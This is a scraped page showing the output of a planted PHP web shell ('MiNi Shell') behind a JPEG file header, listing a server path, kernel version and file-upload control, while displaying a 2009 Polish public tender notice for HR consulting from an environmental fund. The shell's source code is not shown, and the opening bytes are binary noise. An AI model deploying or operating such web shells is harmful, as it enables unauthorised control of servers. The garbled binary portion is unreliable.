JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20090427/66985-N-2009.html

<p class="kh_header"><b>Warszawa: Wartościowanie stanowisk pracy, opracowanie katalogu stanowisk dla zadaniowego systemu pracy, budowa motywacyjnego systemu wynagradzania, opracowanie systemu okresowych ocen pracowniczych i stworzenie koncepcji ruchomego czasu pracy</b><br>
<b>Numer ogłoszenia: 66985 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej , ul. Konstruktorska 3a, 02-673 Warszawa, woj. mazowieckie, tel. 022 4590000, faks 022 4590201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.nfosigw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wartościowanie stanowisk pracy, opracowanie katalogu stanowisk dla zadaniowego systemu pracy, budowa motywacyjnego systemu wynagradzania, opracowanie systemu okresowych ocen pracowniczych i stworzenie koncepcji ruchomego czasu pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wartościowanie stanowisk pracy, opracowanie katalogu stanowisk lub/i grup stanowisk pracy pod kątem możliwości objęcia ich zadaniowym systemem pracy 
i budowa motywacyjnego systemu wynagradzania, opracowanie systemu okresowych ocen pracowniczych i przeprowadzenie jego pilotażu oraz stworzenie koncepcji biznesowej wdrożenia ruchomego czasu pracy wraz z rekomendacją co najmniej trzech rozwiązań technicznych.

Zamówienie zostało podzielone na dwie Części.

Część 1:
Zadanie 1 - Wartościowanie stanowisk pracy,
Zadanie 2 - Opracowanie katalogu stanowisk lub/i grup stanowisk pracy pod kątem możliwości objęcia ich zadaniowym systemem pracy,
Zadanie 3 - Budowa motywacyjnego systemu wynagradzania, 
Zadanie 4 - Opracowanie systemu okresowych ocen pracowniczych i przeprowadzenie jego pilotażu.
Część 2: 
Stworzenie koncepcji biznesowej wdrożenia ruchomego czasu pracy wraz z rekomendacją co najmniej trzech rozwiązań technicznych. Szczegółowy opis przedmiotu zamówienia (odpowiednio dla każdej Części), zawarty został 
w Części III Specyfikacji Istotnych Warunków Zamówienia (zwanej dalej SIWZ), tj. dla Części 1 w Części III-1 SIWZ, dla Części 2 w Części III-2 SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.41.40.00-9, 79.11.10.00-5, 80.53.20.00-2, 79.13.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu, złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (zaleca się złożenie oświadczenia zgodnie z wzorem stanowiącym Załącznik nr 2.1 i/lub 2.2  do Części III SIWZ - Instrukcji dla wykonawców, zwanej dalej IDW oraz pozostałe wymagane poniżej dokumenty: 1) w przypadku Części 1 oraz Części 2 zamówienia: posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, zwanej dalej ustawą Pzp. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, warunek dotyczący uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp, musi być spełniony przez każdego z tych Wykonawców. Ocena spełniania warunku określonego w pkt. 1) zostanie dokonana na podstawie przedłożonych dokumentów wg zasady spełnia-nie spełnia. 2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. Wykonawca musi spełniać następujące warunki: W przypadku Części 1 zamówienia:
a.1) wykazać, że wykonał w okresie ostatnich trzech lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. co najmniej:
- 2 usługi, z których każda była usługą wartościowania co najmniej 50 stanowisk pracy biurowej przy użyciu metody analityczno-punktowej i budowy, na jego podstawie motywacyjnego systemu wynagradzania i każda w całości wykonana była dla jednego podmiotu,
-  2 usługi, które miały na celu przygotowanie podmiotu do wdrożenia  zadaniowego systemu pracy,
-  3 usługi, które miały na celu przygotowanie podmiotu do wdrożenia systemu okresowych ocen pracowniczych;
przy czym, ww. usługi mogą być wykonane w ramach trzech bądź większej liczby usług.

Przez pracę biurową rozumie się pracę związaną z wysiłkiem umysłowym, której efektem są produkty niematerialne powstałe w wyniku zbierania i przetwarzania informacji.
b.1) dysponuje lub będzie dysponował co najmniej 6 konsultantami, którzy będą wykonywali zamówienie i którzy posiadają wykształcenie wyższe, w tym co najmniej: 
- 4 konsultantami, w tym 2 senior konsultantami, z których każdy brał udział w co najmniej 
   3 usługach wartościowania stanowisk pracy przy użyciu metody analityczno-punktowej wraz 
   z budową motywacyjnego systemu wynagradzania. Osoba wskazana jako senior konsultant musi
   posiadać co najmniej 5-letnie doświadczenie zawodowe w zakresie wartościowania i budowy
   motywacyjnego systemu wynagradzania,
- 1 konsultantem, który brał udział w co najmniej 2 usługach, które miały na celu przygotowanie
   podmiotu do wdrożenia zadaniowego systemu pracy i posiada ponad 3 letnie doświadczenie
   zawodowe w powyższej dziedzinie, 
- 1 konsultantem, który brał udział w co najmniej 3 usługach, które miały na celu przygotowanie
   podmiotu do wdrożenia systemu okresowych ocen pracowniczych i posiada ponad 3 letnie
   doświadczenie zawodowe w powyższej dziedzinie. 
Każda z usług, w których brał udział wskazany konsultant winna być przeprowadzona dla co najmniej 50 stanowisk pracy biurowej dla jednego podmiotu.
Przez pracę biurową rozumie się pracę związaną z wysiłkiem umysłowym, której efektem są produkty niematerialne powstałe w wyniku zbierania i przetwarzania informacji. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia: - warunek dotyczący niezbędnej wiedzy i doświadczenia, o którym mowa powyżej w pkt. a.1) oraz pkt. b.1), musi być spełniony łącznie przez tych Wykonawców.
W przypadku Części 2 zamówienia:

a.2) wykazać, że wykonał w okresie ostatnich trzech lat (przed dniem wszczęcia postępowania 
o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, co najmniej 2 usługi, odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. usługi, które miały na celu przygotowanie podmiotu do wdrożenia ruchomego czasu pracy dla co najmniej 250 pracowników na stanowiskach pracy biurowej. 
Przez pracę biurową rozumie się pracę związaną z wysiłkiem umysłowym, której efektem są produkty niematerialne powstałe w wyniku zbierania i przetwarzania informacji.
b.2) dysponuje lub będzie dysponował co najmniej 2 konsultantami, w tym 1 senior konsultantem, którzy będą wykonywali zamówienie i którzy posiadają wykształcenie wyższe oraz każdy z nich brał udział w co najmniej jednym kompleksowym przygotowaniu podmiotu do wdrożenia ruchomego czasu pracy, tj. uwzględniającym prawne, organizacyjne i technologiczne jego elementy.
Osoba wskazana jako senior konsultant musi posiadać co najmniej 5-letnie doświadczenie zawodowe w zakresie wdrażania ruchomego czasu pracy.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia:
- warunek dotyczący niezbędnej wiedzy i doświadczenia, o którym mowa powyżej w pkt. a.2) i pkt. b.2), musi być spełniony łącznie przez tych Wykonawców.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych dokumentów, wg formuły: spełnia - nie spełnia. 
3) W przypadku Części 1 oraz Części 2 zamówienia: znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek muszą oni spełniać łącznie.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych dokumentów, wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą złożyć: 2.1. W przypadku Części 1 oraz Części 2 zamówienia: oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa powyżej w pkt III.2)1. (zaleca się złożenie oświadczenia zgodnie z wzorem stanowiącym Załącznik nr 2.1 i/lub 2.2  do IDW) oraz w celu potwierdzenia spełniania warunku wskazanego w pkt III.2)1.1), Wykonawcy zobowiazani są przedłożyć: a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenie, o których mowa powyżej, musi złożyć każdy z Wykonawców. 2.2. W przypadku Części 1 zamówienia: b) W celu potwierdzenia spełniania warunku wskazanego w pkt III.2)1.2)a.1) Wykonawcy zobowiązani są przedłożyć wykaz usług wykonanych, w okresie ostatnich 3 lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, sporządzony według wzoru stanowiącego Załącznik nr 3.1 do  IDW oraz oryginały lub poświadczone przez Wykonawcę kopie dokumentów potwierdzających, że usługi te zostały wykonane należycie. W celu potwierdzenia spełniania warunku wskazanego w pkt III.2)1.2)b.1) Wykonawcy zobowiązani są przedłożyć wykaz osób, którymi dysponują lub którymi będą dysponować i które będą brały udział w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji i doświadczenia, sporządzony według wzoru stanowiącego Załącznik nr 4.1 do IDW.
W przypadku osób, którymi Wykonawca będzie dysponował do wykonania zamówienia, zobowiązany jest on wskazać (zaznaczyć) te osoby w przedkładanym Wykazie osób oraz dodatkowo przedłożyć zobowiązanie innych podmiotów o udostępnieniu tych osób do wykonania niniejszego zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia wymagane dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku. 2.3. W przypadku Części 2 zamówienia: b) W celu potwierdzenia spełniania warunku wskazanego w pkt III.2)1.2)a.2) Wykonawcy zobowiązani są przedłożyć wykaz usług wykonanych, w okresie ostatnich 3 lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, sporządzony według wzoru stanowiącego Załącznik nr 3.2 do  IDW oraz oryginały lub poświadczone przez Wykonawcę kopie dokumentów potwierdzających, że usługi te zostały wykonane należycie. W celu potwierdzenia spełniania warunku wskazanego w pkt III.2)1.2)b.2) Wykonawcy zobowiązani są przedłożyć wykaz osób, którymi dysponują lub którymi będą dysponować i które będą brały udział w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji i doświadczenia, sporządzony według wzoru stanowiącego Załącznik nr 4.2 do IDW.
W przypadku osób, którymi Wykonawca będzie dysponował do wykonania zamówienia, zobowiązany jest on wskazać (zaznaczyć) te osoby w przedkładanym Wykazie osób oraz dodatkowo przedłożyć zobowiązanie innych podmiotów o udostępnieniu tych osób do wykonania niniejszego zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia wymagane dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku. 2.4. W przypadku Części 1 oraz Części 2 zamówienia: Potwierdzenie spełniania przez Wykonawcę warunku wskazanego w pkt III.2)1.3) nastąpi poprzez złożenie oświadczenia, o którym mowa w pkt III.2)1. 3. Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. III.2)2.2.1.a) powyżej, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument/zaświadczenie takie nie może być wystawione wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Wszystkie dokumenty, o których mowa powyżej w pkt. 2 i 3, Wykonawca składa w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym, muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

W przypadku składania przez jednego Wykonawcę oferty na więcej niż jedną Część zamówienia, Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oddzielnie dla każdej Części zamówienia (dokumenty należy załączyć do oferty składanej na daną Część zamówienia)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Forma szkolenia - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nfosigw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Fundusz ochrony Srodowiska i Gospodarki Wodnej, 02-673 Warszawa, ul. Konstruktorska 1, pokój 214.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie NFOŚiGW przesyłając ją na adres: ul. Konstruktorska 3A, 02-673 Warszawa lub osobiście w pokoju nr 214, ul. Konstruktorska 1 lub w Kancelarii Głównej NFOŚiGW.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo może być udzielone w szczególności: - łącznie przez wszystkich Wykonawców (jeden dokument),
- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców).
W każdym jednak przypadku w treści dokumentu/pełnomocnictwa zaleca się wymienić wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia i wskazać ich Pełnomocnika. Wszelką korespondencję Zamawiający będzie prowadził wyłącznie z Pełnomocnikiem. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialnośc za wykonanie umowy. 2. SIWZ można pobrać ze strony internetowej Zamawiającego podanej w sekcji I. 3.termin zwiazania ofertą (30 dni), zgodnie z art. 85 ust. 5 ustawy Pzp, zaczyna bieg wraz z upływem terminu składania ofert i liczony jest łącznie z tym dniem. 4. W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem (numer faksu Zamawiającego 
0-22 45 90 201). Zawsze dopuszczalna jest forma pisemna. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej, niezwłocznie potwierdza fakt ich otrzymania. W przypadku konieczności złożenia przez Wykonawcę wyjaśnień dotyczących treści oferty lub złożonych dokumentów - wyjaśnienia te mogą być składane faksem. W przypadku uzupełnienia złożonych przez Wykonawcę dokumentów - składane są one w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę, z zastrzeżeniem pkt 12.2.9) IDW, w zakresie dotyczącym formy Pełnomocnictwa. Osobą uprawnioną przez Zamawiającego do kontaktowania się z Wykonawcami jest Dominika Chwałek - tel. +48 22 45 90 292. 5. Oświadczenia i dokumenty składane przez Wykonawcę wraz z ofertą, dla których Zamawiający określił wzory w IDW, powinny zostać sporządzone z ich wykorzystaniem lub być z nimi zgodne - co do treści. 6. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 7. Postępowanie oznaczone jest numerem - ZZP/09/2009. 8. Wykonawca może złożyć ofertę na jedną lub dwie Części zamówienia. 9. Termin określony w sekcji II.2) jest terminem dla Części 1 zamówienia. Terminy dla każdej Części zamówienia określone zostały odpowiednio w Załączniku I - Informacje dotyczące ofert częściowych.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wartościowanie stanowisk pracy, opracowanie katalogu stanowisk dla zadaniowego systemu pracy, budowa motywacyjnego systemu wynagradzania, opracowanie systemu okresowych ocen pracowniczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1:
Zadanie 1 - Wartościowanie stanowisk pracy,
Zadanie 2 - Opracowanie katalogu stanowisk lub/i grup stanowisk pracy pod kątem możliwości objęcia ich zadaniowym systemem pracy,
Zadanie 3 - Budowa motywacyjnego systemu wynagradzania, 
Zadanie 4 - Opracowanie systemu okresowych ocen pracowniczych i przeprowadzenie jego pilotażu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.40.00-9, 79.11.10.00-5, 80.53.20.00-2, 79.13.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Forma szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Stworzenie koncepcji ruchomego czasu pracy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stworzenie koncepcji biznesowej wdrożenia ruchomego czasu pracy wraz z rekomendacją co najmniej trzech rozwiązań technicznych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.40.00-9, 79.11.10.00-5, 80.53.20.00-2, 79.13.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Forma szkolenia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com